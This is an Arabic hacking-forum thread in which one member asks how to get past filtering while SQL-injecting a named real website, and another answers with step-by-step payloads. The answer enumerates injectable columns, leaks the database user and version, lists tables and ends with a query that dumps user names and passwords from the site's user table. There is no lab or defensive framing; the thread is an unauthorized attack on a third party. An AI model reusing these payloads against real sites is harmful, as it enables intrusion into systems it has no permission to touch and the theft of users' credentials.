التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
تحديث الصفحة about SQL injection
التعليمات التقويم البحث مشاركات اليوم

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
السابق المشاركة السابقة   المشاركة التالية التالي
قديم 03-10-2012, 07:21 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية DBZ
 

 
 
إحصائية العضو






DBZ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DBZ is on a distinguished road
سؤال مجاب: about SQL injection

http://hopelutherancranberry.org/readnews.php?id=199


هذا الموقع فيه فلترة كبيره تجاوزت البعض و فشلت في البعض
حاولت بكل الشرحات و ما فيها اي حل
هاي الخطوات الي تفاديتها :
كود PHP:
http://hopelutherancranberry.org/readnews.php?id=199'/*!UNION SELECT*/ 1,2,3,/*!group_concat*/(table_name),5,6,7 from information_schema.tables-- - 
لما بجي انفذ امر استعلام الجداول يعطيني فوردبيدن
و لما استخدم دا الامر :
كود PHP:
http://hopelutherancranberry.org/readnews.php?id=199'/*!UNION SELECT*/ 1,2,3,/*!concat*/(column_name,0x3a,table_name,0x3a,table_schema),5,6,7 from information_schema.columns-- - 
الاستعلام مافيه فوربيدن و لكن ما يخرج لي اي معلومات و الله غريب
شو النتيجه :
كود:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/hope/public_html/readnews.php on line 78
كانه خطا في الاستعلام، و انا اضنه ذا الاستعلام صحيح 100%
لا فيه احد الطلاب هنا محترف حقن يفيدنا و اجركم على الله

سلام عليكم


Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC about SQL injection

التوقيع

http://data0.eklablog.com/puissance-...e641555_12.gif

و قل ربي زدني علما

 

   

رد مع اقتباس
أفضل جواب - كتبه aircrack -ng
كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,4,5,6,7-- - 
الاعمده المصابه 4 و6

اصدار القاعده 5
hope_hope@localhost : hope_hope : 5.0.95-community

كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7-- - 
الجداول

كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,table_name,5,6,7+from+information_schema. tables-- - 
الحقنه
كود PHP:
http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,CONCAT_WS(CHAR(32,58,32),name,pass),5,6,7++from+thyme_Users-- - 
 

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »
أدوات الموضوع
انواع عرض الموضوع
العرض الشجري العرض الشجري

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع


الساعة الآن 12:01 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0